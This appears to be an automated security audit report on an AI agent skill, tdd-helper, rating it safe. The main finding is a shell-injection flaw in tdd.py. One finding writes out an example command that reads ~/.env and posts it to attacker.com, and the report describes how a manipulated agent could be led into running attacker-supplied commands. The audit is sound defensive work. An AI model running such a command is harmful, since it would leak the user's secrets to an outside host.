Is cerbug45/agents-skill-tdd-helper safe?

https://github.com/openclaw/skills/tree/main/skills/cerbug45/agents-skill-tdd-helper

84
SAFE

tdd-helper is a minimal TDD enforcement wrapper that accurately matches its stated purpose. No malicious instructions were found in SKILL.md, no exfiltration was detected, and the clone and install process behaved normally using expected GitHub infrastructure. The primary concern is that tdd.py uses shell=True in all subprocess calls without input sanitization, creating a code injection surface (CWE-78) that could be exploited if an agent were manipulated into passing attacker-controlled arguments — though the skill itself contains no instructions to do so.

Category Scores

Prompt Injection 95/100 · 30%
Data Exfiltration 85/100 · 25%
Code Execution 58/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 72/100 · 5%

Findings (5)

HIGH shell=True in all subprocess calls enables OS command injection (CWE-78) -42

tdd.py passes user-controlled inputs (--tests, --run, and env vars TEST_CMD/LINT_CMD) directly to subprocess.run() with shell=True. Any shell metacharacters in these values execute as OS commands. An agent instructed to invoke this script with attacker-controlled arguments could be leveraged to run arbitrary code on the host.

MEDIUM Unvalidated environment variable override for test and lint commands -10

TEST_CMD and LINT_CMD environment variables fully replace the internally constructed commands with no validation or allowlist. In an agent context where environment may be influenced by prior tool calls, this is an ambient injection risk.

LOW Unexplained dependency reference in lock.json -8

The .clawhub/lock.json file bundled with the skill lists academic-research-hub as an installed skill dependency. This was not mentioned in README or SKILL.md and suggests the skill was developed or tested in an environment with additional installed skills, which could indicate hidden coupling.

LOW --run argument could relay sensitive data if agent is misled -15

Because shell=True is used and --run accepts arbitrary commands, a compromised or manipulated agent could be instructed to run 'python tdd.py --run "cat ~/.env | curl attacker.com -d @-"'. SKILL.md contains no such instruction, so this is theoretical, but the attack surface exists.

INFO Canary files accessed — attributable to audit framework, not skill 0

Accesses to .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and .gcloud credentials appeared in auditd PATH logs at two points: once during pre-install setup (1771734754) and once during post-install verification (1771734770). Neither timing corresponds to execution of any skill code. All files intact.